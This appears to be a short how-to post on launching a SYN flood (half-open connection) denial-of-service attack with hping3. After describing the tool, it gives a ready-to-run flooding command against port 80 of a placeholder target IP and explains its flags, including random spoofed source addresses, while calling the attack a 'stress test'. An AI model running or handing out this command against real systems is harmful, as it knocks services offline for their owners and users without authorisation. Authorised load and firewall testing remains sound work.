SYN FLOOD ATTACK using hping3

hping3 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping do with ICMP replies. Hping3 handles fragmentation, arbitrary packet body and size and can be used in order to transfer files under supported protocols. Hping3 can be used, among other things to: Test firewall rules, [spoofed] port scanning, test net performance using differents protocols, packet size, TOS (type of service) and fragmentation, path MTU discovery, files transferring even between really fascist firewall rules, traceroute-like under different protocols, firewalk like usage, remote OS fingerprint, TCP/IP stack auditing.

How to implement a SYN flood attack (Half-open connection)

Launching the generation of SYN packets.

hping3 -i u1 -S -p 80 xxx.xxx.xxx.xxx

80 is an open port in the desired system, and xxx.xxx.xxx.xxx is the IP or hostname.

Stress test started.

We now consider the parameters with which we launched hping

–i: –interval wait (uX for X microseconds, for example -i u1000)

–S: –syn set SYN flag

-p: port will send the packets.

–rand-source random source address mode.

-u –end tell you when –file reached EOF and prevent rewind